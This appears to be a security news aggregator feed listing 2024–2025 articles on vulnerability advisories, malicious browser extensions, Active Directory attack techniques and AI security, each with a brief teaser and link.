Proofpoint Leaders Named CRN Channel Chiefs 2025

https://www.proofpoint.com/us/newsroom/news/proofpoint-leaders-named-crn-channel-chiefs-2025
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How AI-driven SOC co-pilots will change security center operations
Have you ever wished you had an assistant at your security operations centers (SOCs) — especially one who never calls in sick, has a bad day or takes a long lunch? Your wish may come true soon. Not surprisingly, AI-driven SOC “co-pilots” are topping the lists for cybersecurity predictions in 2025, which often describe these […] The post How AI-driven SOC co-pilots will change security center operations appeared first on Security Intelligence.
https://securityintelligence.com/articles/how-ai-driven-soc-co-pilots-will-change-security-center-operations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Phishing tax scams increase as tax deadlines approach

https://www.proofpoint.com/us/newsroom/news/phishing-tax-scams-increase-tax-deadlines-approach
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Analysis of an advanced malicious Chrome extension
Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn't possible to analyze their functionality in detail. However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article. Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality...
https://palant.info/2025/02/03/analysis-of-an-advanced-malicious-chrome-extension/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How scammers are exploiting DeepSeek's rise
As is their wont, cybercriminals waste no time launching attacks that aim to cash in on the frenzy around the latest big thing – plus, what else to know before using DeepSeek
https://www.welivesecurity.com/en/cybersecurity/scammers-exploiting-deepseek-hype/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Atlassian Confluence Remote Code Execution (CVE-2023-22527)
What is the Vulnerability?On Jan 16, 2024, Atlassian released an advisory for a template injection vulnerability on Confluence Data Center and Server. That can allow an unauthenticated attacker to remotely execute malicious code on affected versions. This vulnerability is rated with a severity level of 10.0 (Critical). What is the Vendor Solution?Atlassian highly recommend applying the latest version available as listed on their advisory. CVE-2023-22527 - Atlassian Support | Atlassian DocumentationWhat FortiGuard Coverage is available?FortiGuard Labs has an IPS signature "Atlassian.Confluence.CVE-2023-22527.Remote.Code.Execution" in place for CVE-2023-22527. The FortiGuard is seeing active exploitation attempts on this vulnerability.
https://fortiguard.fortinet.com/threat-signal-report/5376
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cleo Multiple File Transfer Vulnerabilities (CVE-2024-50623, CVE-2024-55956)
What is the Vulnerability? The critical flaws allow attackers to exploit unrestricted file uploads and downloads, leading to Remote Code Execution affecting multiple Cleo products is being actively exploited in the wild. The vulnerability affects the following Cleo products (versions before and including 5.8.0.21)-Cleo Harmony -Cleo VLTrader -Cleo LexiCom Cleo is a software company focused on Managed File Transfer (MFT) solutions. Its products-Cleo VLTrader, Cleo Harmony, and Cleo LexiCom facilitates secure file transfers, B2B integration, and streamlines data exchange and integration.On December 13, 2024, CISA confirmed that the CVE-2024-50623, is being actively exploited, including in Ransomware campaigns and has been added to the Known Exploited Vulnerabilities (KEV) catalog.What is the...
https://fortiguard.fortinet.com/threat-signal-report/5602
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Windows Bug Class: Accessing Trapped COM Objects with IDispatch
Posted by James Forshaw, Google Project Zero Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server. This flexibility has a number of downsides, one of which is the topic of this...
https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)
Posted by James Forshaw, Google Project Zero Back in 2021 I wrote a blog post about various ways you can build a virtual memory access trap primitive on Windows. The goal was to cause a reader or writer of a virtual memory address to halt for a significant (e.g. 1 or more seconds) amount of time, generally for the purpose of exploiting TOCTOU memory access bugs in the kernel. The solutions proposed in the blog post were to either map an SMB file on a remote server, or abuse the Cloud Filter API. This blog isn't going to provide new solutions, instead I wanted to highlight a new feature of Windows 11 24H2 that introduces the ability to abuse the SMB file server directly on the local machine, no remote server required. This change also introduces the ability to locally exploit vulnerabilities...
https://googleprojectzero.blogspot.com/2025/01/windows-exploitation-tricks-trapping.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

This month in security with Tony Anscombe – January 2025 edition
DeepSeek's bursting onto the AI scene, apparent shifts in US cybersecurity policies, and a massive student data breach all signal another eventful year in cybersecurity and data privacy
https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-january-2025-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AD Recon: Kerberos Username Bruteforce
In this post, we explore the exploitation technique known as the Kerberos pre-authentication brute-force attack. This attack takes advantage of Kerberos authentication responses to determine The post AD Recon: Kerberos Username Bruteforce appeared first on Hacking Articles.
https://www.hackingarticles.in/ad-recon-kerberos-username-bruteforce/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Untrustworthy AI: How to deal with data poisoning
You should think twice before trusting your AI assistant, as database poisoning can markedly alter its output – even dangerously so
https://www.welivesecurity.com/en/business-security/untrustworthy-ai-data-poisoning/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How we kept the Google Play & Android app ecosystems safe in 2024
Posted by Bethel Otuteye and Khawaja Shams (Android Security and Privacy Team), and Ron Aquino (Play Trust and Safety) Android and Google Play comprise a vibrant ecosystem with billions of users around the globe and millions of helpful apps. Keeping this ecosystem safe for users and developers remains our top priority. However, like any flourishing ecosystem, it also attracts its share of bad actors. That's why every year, we continue to invest in more ways to protect our community and fight bad actors, so users can trust the apps they download from Google Play and developers can build thriving businesses. Last year, those investments included AI-powered threat detection, stronger privacy policies, supercharged developer tools, new industry-wide alliances, and more. As a result, we...
http://security.googleblog.com/2025/01/how-we-kept-google-play-android-app-ecosystem-safe-2024.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity researchers: Digital detectives in a connected world
Discover the exciting world of cybersecurity research: what researchers do, essential skills, and actionable steps to begin your journey toward protecting the digital world. The post Cybersecurity researchers: Digital detectives in a connected world appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/cybersecurity-researchers-digital-detectives-in-a-connected-world/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Credential Dumping: AD User Comment
In this article, we shall explore different tools & techniques that help us enumerate Active Directory (AD) users’ passwords using which an attacker can expand The post Credential Dumping: AD User Comment appeared first on Hacking Articles.
https://www.hackingarticles.in/credential-dumping-ad-user-comment/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How we estimate the risk from prompt injection attacks on AI systems
Posted by the Agentic AI Security Team at Google DeepMindModern AI systems, like Gemini, are more capable than ever, helping retrieve data and perform actions on behalf of users. However, data from external sources present new security challenges if untrusted sources are available to execute instructions on AI systems. Attackers can take advantage of this by hiding malicious instructions in data that are likely to be retrieved by the AI system, to manipulate its behavior. This type of attack is commonly referred to as an "indirect prompt injection," a term first coined by Kai Greshake and the NVIDIA team.To mitigate the risk posed by this class of attacks, we are actively deploying defenses within our AI systems along with measurement and monitoring tools. One of these tools is a robust evaluation...
http://security.googleblog.com/2025/01/how-we-estimate-risk-from-prompt.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

BloodHound Community Edition Custom Queries
This blog post introduces our new custom queries for BloodHound Community Edition (CE) and explains how you can use them effectively to analyze your Active Directory infrastructure. TL;DR: Check out our new BloodHound CE custom queries! Active Directory and BloodHound The majority of our customers run a Microsoft Active Directory infrastructure, either exclusively on-prem or […]
https://blog.compass-security.com/2025/01/bloodhound-community-edition-custom-queries/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Privacy-Preserving Federated Learning – Future Collaboration and Continued Research
This post is the final blog in a series on privacy-preserving federated learning . The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . Reflections and Wider Considerations This is the final post in the series that began with reflections and learnings from the first US-UK collaboration working with Privacy Enhancing Technologies (PETs). Since the PETs Prize
https://www.nist.gov/blogs/cybersecurity-insights/privacy-preserving-federated-learning-future-collaboration-and
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Diamond Ticket Attack: Abusing kerberos Trust
The Diamond Ticket attack represents a sophisticated escalation in Active Directory (AD) exploitation methods, leveraging intricate flaws in Kerberos authentication and authorization mechanisms. This article The post Diamond Ticket Attack: Abusing kerberos Trust appeared first on Hacking Articles.
https://www.hackingarticles.in/diamond-ticket-attack-abusing-kerberos-trust/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with AWS Sign-in IAM User Login Flow – Possible Username Enumeration (CVE-2025-0693)
Publication Date: 2025/01/23 1:30 PM PDT We have identified CVE-2025-0693 in the AWS Identity and Access Management (AWS IAM) Sign-in login flow. This issue could allow an actor to enumerate AWS IAM usernames by measuring server response times during login attempts. Variations in those response times could allow an actor to discern whether a submitted AWS IAM username existed in the account. Please note that username information alone is insufficient to authenticate or access any AWS resources. Full authentication, including account identifier, username, password, and multi-factor authentication (if enabled), is required to access an account. Additionally, AWS leverages multiple layers of protection to monitor and respond to potential misuse of our sign-in endpoints. Affected versions:...
https://aws.amazon.com/security/security-bulletins/AWS-2025-002/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Android enhances theft protection with Identity Check and expanded features
Posted by Jianing Sandra Guo, Product Manager, Android, Nataliya Stanetsky, Staff Program Manager, Android Today, people around the world rely on their mobile devices to help them stay connected with friends and family, manage finances, keep track of healthcare information and more – all from their fingertips. But a stolen device in the wrong hands can expose sensitive data, leaving you vulnerable to identity theft, financial fraud and privacy breaches. This is why we recently launched Android theft protection, a comprehensive suite of features designed to protect you and your data at every stage – before, during, and after device theft. As part of our commitment to help you stay safe on Android, we're expanding and enhancing these features to deliver even more robust protection...
http://security.googleblog.com/2025/01/android-theft-protection-identity-check-expanded-features.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Proofpoint and Ingram Micro Team to Radically Simplify and Accelerate Sales Cycles for Partners

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-and-ingram-micro-team-radically-simplify-and-accelerate-sales
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Attacks on Maven proxy repositories
Learn how specially crafted artifacts can be used to attack Maven repository managers. This post describes PoC exploits that can lead to pre-auth remote code execution and poisoning of the local artifacts in Sonatype Nexus and JFrog Artifactory. The post Attacks on Maven proxy repositories appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/attacks-on-maven-proxy-repositories/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.4.2 and 1.0.8 security patch versions published
Today, we are publishing the 1.4.2 and 1.0.8 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version.1.4.2 ClamAV 1.4.2 is a patch release with the following fixes: CVE-2025-20128: Fixed a possible buffer overflow read bug in the OLE2 file parser that could cause a denial-of-service (DoS) condition. This issue was introduced in version 1.0.0 and affects all currently supported versions. It will be fixed in: 1.4.2 and 1.0.8 Thank you to OSS-Fuzz for identifying this issue. 1.0.8 ClamAV 1.0.8 is a patch release with the following fixes:CVE-2025-20128:...
http://blog.clamav.net/2025/01/clamav-142-and-108-security-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Continued Scanning for CVE-2023-1389
TP-Link draws the attention of the US Government.
https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

October 2024 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for October 2024 where I collected and analyzed 240 events...
https://www.hackmageddon.com/2025/01/21/october-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malicious extensions circumvent Google's remote code ban
As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn't in form of a policy but rather a technical change introduced with Manifest V3. As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I've already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions...
https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

OSV-SCALIBR: A library for Software Composition Analysis
Posted by Erik Varga, Vulnerability Management, and Rex Pan, Open Source Security TeamIn December 2022, we announced OSV-Scanner, a tool to enable developers to easily scan for vulnerabilities in their open source dependencies. Together with the open source community, we've continued to build this tool, adding remediation features, as well as expanding ecosystem support to 11 programming languages and 20 package manager formats. Today, we're excited to release OSV-SCALIBR (Software Composition Analysis LIBRary), an extensible library for SCA and file system scanning. OSV-SCALIBR combines Google's internal vulnerability management expertise into one scanning library with significant new capabilities such as:SCA for installed packages, standalone binaries, as well as source codeOSes...
http://security.googleblog.com/2025/01/osv-scalibr-library-for-software.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

16-31 October 2024 Cyber Attacks Timeline
In the second timeline of October 2024 I collected 120 events with a threat landscape dominated by malware...
https://www.hackmageddon.com/2025/01/16/16-31-october-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with Amazon WorkSpaces, Amazon AppStream 2.0, and Amazon DCV (CVE-2025-0500 and CVE-2025-0501)
Publication Date: 2025/01/15 10:30AM PST Description: AWS identified two issues in specific versions of native clients for Amazon WorkSpaces, Amazon AppStream 2.0, and Amazon DCV. We have proactively communicated with customers regarding the end of support for these impacted versions. CVE-2025-0500: This issue applies to specific versions of native clients for Amazon WorkSpaces (when running Amazon DCV protocol), Amazon AppStream 2.0, and Amazon DCV, listed below. If leveraged, this issue could allow a bad actor to perform a man-in-the-middle attack, allowing them to access remote WorkSpaces, AppStream, or DCV sessions. We recommend customers upgrade to the versions with the fix to address this issue. Affected versions: Amazon WorkSpaces Windows client 5.20.0 or earlier,...
https://aws.amazon.com/security/security-bulletins/AWS-2025-001/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hitchhiker's Guide to Managed Security
Over the past few years, we have had the opportunity to conduct several Purple Teaming exercises together with our customers. Particularly after Purple Teaming exercises involving external providers, we often see a mismatch between the customer's expectations and the service provided. This blog post attempts to summarize how to prevent the most prevalent issues with a managed security service as early as possible.
https://blog.compass-security.com/2025/01/hitchhikers-guide-to-managed-security/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Out-of-bounds Write in IPSEC Daemon
An Out-of-bounds Write in FortiOS IPSEC daemon may allow an unauthenticated attacker to perform a denial of service under certains conditions that are outside the control of the attacker. Revised on 2025-03-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-373
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Chrome Web Store is a mess
Let's make one thing clear first: I'm not singling out Google's handling of problematic and malicious browser extensions because it is worse than Microsoft's for example. No, Microsoft is probably even worse but I never bothered finding out. That's because Microsoft Edge doesn't matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe? Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required”...
https://palant.info/2025/01/13/chrome-web-store-is-a-mess/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

BIScience: Collecting browsing history under false pretenses
This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email. Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors. This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years. Screenshot of claims on the BIScience website Contents Who is BIScience? BIScience collects data from millions of users BIScience buys data from partner third-party extensions BIScience receives raw...
https://palant.info/2025/01/13/biscience-collecting-browsing-history-under-false-pretenses/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to secure your GitHub Actions workflows with CodeQL
In the last few months, we secured 75+ GitHub Actions workflows in open source projects, disclosing 90+ different vulnerabilities. Out of this research we produced new support for workflows in CodeQL, empowering you to secure yours. The post How to secure your GitHub Actions workflows with CodeQL appeared first on The GitHub Blog.
https://github.blog/security/application-security/how-to-secure-your-github-actions-workflows-with-codeql/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Dangers of DNS Hijacking
How expired domains and improper DNS management can lead to severe security risks like MitM attacks, fraudulent TLS/SSL certifications, and more.
https://www.f5.com/labs/articles/threat-intelligence/the-dangers-of-dns-hijacking
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Proofpoint Named a Leader in 2025 Gartner® Magic Quadrant™ for Digital Communications Governance and Archiving Solutions

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-named-leader-2024-gartner-magic-quadrant-digital-communications
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Abusing AD-DACL: AddSelf
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the AddSelf permission in Active Directory environments. By exploiting this The post Abusing AD-DACL: AddSelf appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-addself/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.4 as Next Long-Term Stable (LTS)
We are excited to announce that ClamAV 1.4 is now designated as our latest Long-Term Stable (LTS) release. Previously, we planned to announce 1.5 as the next LTS version at the end of 2024. However, unforeseen challenges have delayed the 1.5 release, leading us to choose version 1.4 for long-term support. We apologize for any inconvenience that our delay in the announcement may have caused. The version support dates for ClamAV 1.4 are amended as follows: Key Dates: Initial 1.4 Release Date: August 15, 2024 Patch Versions Continue Until: August 15, 2027 DB Downloads Allowed Until: August 15, 2028 For specific details, please read the ClamAV EOL Policy. Looking ahead, the beta version of ClamAV 1.5 will soon be available for community review. This version will...
http://blog.clamav.net/2025/01/clamav-14-as-next-long-term-stable-lts.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How extensions trick CWS search
A few months ago I searched for “Norton Password Manager” in Chrome Web Store and got lots of seemingly unrelated results. Not just that, the actual Norton Password Manager was listed last. These search results are still essentially the same today, only that Norton Password Manager moved to the top of the list: I was stumped how Google managed to mess up search results so badly and even posted the following on Mastodon: Interesting. When I search for “Norton Password Manager” on Chrome Web Store, it first lists five completely unrelated extensions, and only the last search result is the actual Norton Password Manager. Somebody told me that website is run by a company specializing in search, so this shouldn't be due to incompetence, right? What is it then? Somebody suggested that...
https://palant.info/2025/01/08/how-extensions-trick-cws-search/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Beyond the Hype: How to Set Up Your AI Project for Real Success

https://www.proofpoint.com/us/newsroom/news/beyond-hype-how-set-your-ai-project-real-success
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

1-15 October 2024 Cyber Attacks Timeline
In the first timeline of October 2024, I collected 120 events (8 events/day) with a threat landscape...
https://www.hackmageddon.com/2025/01/07/1-15-october-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Digital transformation 2025: What's in, what's out

https://www.proofpoint.com/us/newsroom/news/digital-transformation-2025-whats-whats-out
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malware metamorphosis: 2024 reflections and 2025 predictions.

https://www.proofpoint.com/us/newsroom/news/malware-metamorphosis-2024-reflections-and-2025-predictions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Boards Need To Know On Digital And Cybersecurity Governance In 2025

https://www.proofpoint.com/us/newsroom/news/what-boards-need-know-digital-and-cybersecurity-governance-2025
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Fun Chat With Patrick Miller
Happy Saturday, all! I hope you’re having a lovely weekend. This week, I had a fun chat with a long time friend and colleague, Ampyx‘s Patrick Miller. We talked about one of my favorite tech topics – digital forensics in the weird and wacky world of critical infrastructure – where it’s growing, where it’s struggling, […]
https://tisiphone.net/2025/01/04/a-fun-chat-with-patrick-miller/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Active Directory Pentesting Using Netexec Tool: A Complete Guide
Active Directory (AD) penetration testing is an essential part of the security assessment of enterprise networks. The Netexec tool offers a wide range of capabilities The post Active Directory Pentesting Using Netexec Tool: A Complete Guide appeared first on Hacking Articles.
https://www.hackingarticles.in/active-directory-pentesting-using-netexec-tool-a-complete-guide/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with RedShift JDBC Driver, Python Connector and ODBC Driver - (CVE-2024-12744, CVE-2024-12745, CVE-2024-12746)
Publication Date: 2024/12/24 10:00AM PST AWS has identified the following issues within the Amazon Redshift JDBC Driver, Amazon Redshift Python Connector, and Amazon Redshift ODBC Driver. On December 23, 2024, we released a fix and recommend customers upgrade to the latest version to address these issues. The Amazon Redshift JDBC Driver, version 2.1.0.31, is affected by CVE-2024-12744, a SQL injection issue when utilizing the getSchemas, getTables, or getColumns Metadata APIs. This issue has been addressed in driver version 2.1.0.32. We recommend customers upgrade to the driver version 2.1.0.32 or revert to driver version 2.1.0.30. The Amazon Redshift Python Connector, version 2.1.4, is affected by CVE-2024-12745, a SQL injection issue when utilizing the get_schemas, get_tables, or...
https://aws.amazon.com/security/security-bulletins/AWS-2024-015/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Announcing CodeQL Community Packs
We are excited to introduce the new CodeQL Community Packs, a comprehensive set of queries and models designed to enhance your code analysis capabilities. These packs are tailored to augment… The post Announcing CodeQL Community Packs appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/announcing-codeql-community-packs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Q3 2024 Cyber Attacks Statistics
I aggregated the statistics created from the cyber attacks timelines published in the third quarter of 2024. In this period, I collected...
https://www.hackmageddon.com/2024/12/23/q3-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Windows Registry Adventure #5: The regf file format
Posted by Mateusz Jurczyk, Google Project Zero As previously mentioned in the second installment of the blog post series ("A brief history of the feature"), the binary format used to encode registry hives from Windows NT 3.1 up to the modern Windows 11 is called regf. In a way, it is quite special, because it represents a registry subtree simultaneously on disk and in memory, as opposed to most other common file formats. Documents, images, videos, etc. are generally designed to store data efficiently on disk, and they are subsequently parsed to and from different in-memory representations whenever they are read or written. This seems only natural, as offline storage and RAM come with different constraints and requirements. On disk, it is important that the data is packed as...
https://googleprojectzero.blogspot.com/2024/12/the-windows-registry-adventure-5-regf.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NIST's International Cybersecurity and Privacy Engagement Update – New Translations
As the year comes to a close, NIST continues to engage with our international partners to strengthen cybersecurity, including sharing over ten new international translations in over six languages as resources for our stakeholders around the world. These efforts were complemented by discussions on opportunities for future enhanced international collaboration and resource sharing. Here are some updates from the past few months: Our international engagement continues through our support to the Department of State and the International Trade Administration (ITA) during numerous international
https://www.nist.gov/blogs/cybersecurity-insights/nists-international-cybersecurity-and-privacy-engagement-update-new
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

September 2024 Cyber Attacks Statistics
After the corresponding cyber attacks timelines, it's time to publish the statistics for September 2024 where I collected and analyzed 257 events. During September 2024...
https://www.hackmageddon.com/2024/12/19/september-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Biggest Data Breaches of 2024
Similarly to what I have done in the past few years, I am collecting the main mega breaches (that is breaches with more than one million records stolen by the attackers and possibly leaked).
https://www.hackmageddon.com/2024/12/18/the-biggest-data-breaches-of-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Uncovering GStreamer secrets
In this post, I'll walk you through the vulnerabilities I uncovered in the GStreamer library and how I built a custom fuzzing generator to target MP4 files. The post Uncovering GStreamer secrets appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/uncovering-gstreamer-secrets/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

16-30 September 2024 Cyber Attacks Timeline
In the second timeline of September 2024 I collected 130 events (8.67 events/day) with a threat landscape...
https://www.hackmageddon.com/2024/12/17/16-30-september-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

2025 Cybersecurity Predictions
“I never think of the future. It comes soon enough.”
https://www.f5.com/labs/articles/cisotociso/2025-cybersecurity-predictions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Nifty Initial Access Payload
Red Teaming engagements are “realistic” attack simulations designed to test the security posture of an organization and its Blue Team. This term is used in many different ways, so if you’re not sure where to draw the line, Michael Schneier’s latest blog post provides a good comparison of different types of assessment. Anyway, when doing […]
https://blog.compass-security.com/2024/12/a-nifty-initial-access-payload/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Qualcomm DSP Driver - Unexpectedly Excavating an Exploit
Posted by Seth Jenkins, Google Project ZeroThis blog post provides a technical analysis of exploit artifacts provided to us by Google's Threat Analysis Group (TAG) from Amnesty International. Amnesty’s report on these exploits is available here. Thanks to both Amnesty International and Google's Threat Analysis Group for providing the artifacts and collaborating on the subsequent technical analysis!IntroductionEarlier this year, Google's TAG received some kernel panic logs generated by an In-the-Wild (ITW) exploit. Those logs kicked off a bug hunt that led to the discovery of 6 vulnerabilities in one Qualcomm driver over the course of 2.5 months, including one issue that TAG reported as ITW. This blog post covers the details of the original artifacts, each of the bugs discovered,...
https://googleprojectzero.blogspot.com/2024/12/qualcomm-dsp-driver-unexpectedly-excavating-exploit.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Dirty DAG - Azure Apache Airflow Integration Vulnerabilities
Unit 42 researchers identified vulnerabilities in the Azure Data Factory's integration with Apache Airflow. These vulnerabilities include misconfigured Kubernetes Role-Based Access Control (RBAC), improper secret handling in Azure's internal Geneva service, and weak authentication mechanisms. Exploiting these flaws, attackers could gain shadow admin control over Azure infrastructure by crafting malicious DAG files or compromising service principals, leading to unauthorized access, data exfiltration, malware deployment, and persistent control of the cluster. Once attackers gain access, they can escalate privileges within the Azure Kubernetes Service (AKS) cluster, compromise containerized environments, and exploit Azure's Geneva service to manipulate logs and metrics. The research highlighted...
https://www.cloudvulndb.org/azure-airflow-vulnerabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ways to Mitigate Risk in Cybersecurity: Cybersecurity Risk Management
Cyber threats can wreak havoc on businesses, from data breaches to loss of reputation. Luckily, there are effective strategies available that can reduce cybersecurity risk. Avoidance is one of the... The post Ways to Mitigate Risk in Cybersecurity: Cybersecurity Risk Management appeared first on Hacker Combat.
https://www.hackercombat.com/cybersecurity-risk-management/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Windows Tooling Updates: OleView.NET
Posted by James Forshaw, Google Project ZeroThis is a short blog post about some recent improvements I've been making to the OleView.NET tool which has been released as part of version 1.16. The tool is designed to discover the attack surface of Windows COM and find security vulnerabilities such as privilege escalation and remote code execution. The updates were recently presented at the Microsoft Bluehat conference in Redmond under the name "DCOM Research for Everyone!". This blog expands on the topics discussed to give a bit more background and detail that couldn't be fit within the 45-minute timeslot. This post assumes a knowledge of COM as I'm only going to describe a limited number of terms.Using the OleView.NET Tooling Before we start the discussion it's important...
https://googleprojectzero.blogspot.com/2024/12/windows-tooling-updates-oleviewnet.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with DynamoDB local - CVE-2022-1471
Publication Date: 2024/12/11 2:00PM PST AWS is aware of CVE-2022-1471 in SnakeYaml software, included in DynamoDB local jar and Docker distributions from version 1.21 and version 2.0. If leveraged, this issue could allow an actor to perform remote code execution using the SnakeYaml's Constructor(), as the software does not restrict the types that can be instantiated during deserialization. AWS has found no evidence that this issue has been leveraged, however, customers should still take action. On November 6, 2024, we released a fix for this issue. Customers should upgrade DynamoDB local to the latest version: v1.25.1 and above, or 2.5.3 and above. Please email aws-security@amazon.com with any security questions or concerns.
https://aws.amazon.com/security/security-bulletins/AWS-2024-014/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CodeQL zero to hero part 4: Gradio framework case study
Learn how I discovered 11 new vulnerabilities by writing CodeQL models for Gradio framework and how you can do it, too. The post CodeQL zero to hero part 4: Gradio framework case study appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/codeql-zero-to-hero-part-4-gradio-framework-case-study/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Abusing AD-DACL: WriteOwner
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the WriteOwner permission in Active Directory environments. The WriteOwner permission The post Abusing AD-DACL: WriteOwner appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-writeowner/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Google Cloud expands vulnerability detection for Artifact Registry using OSV
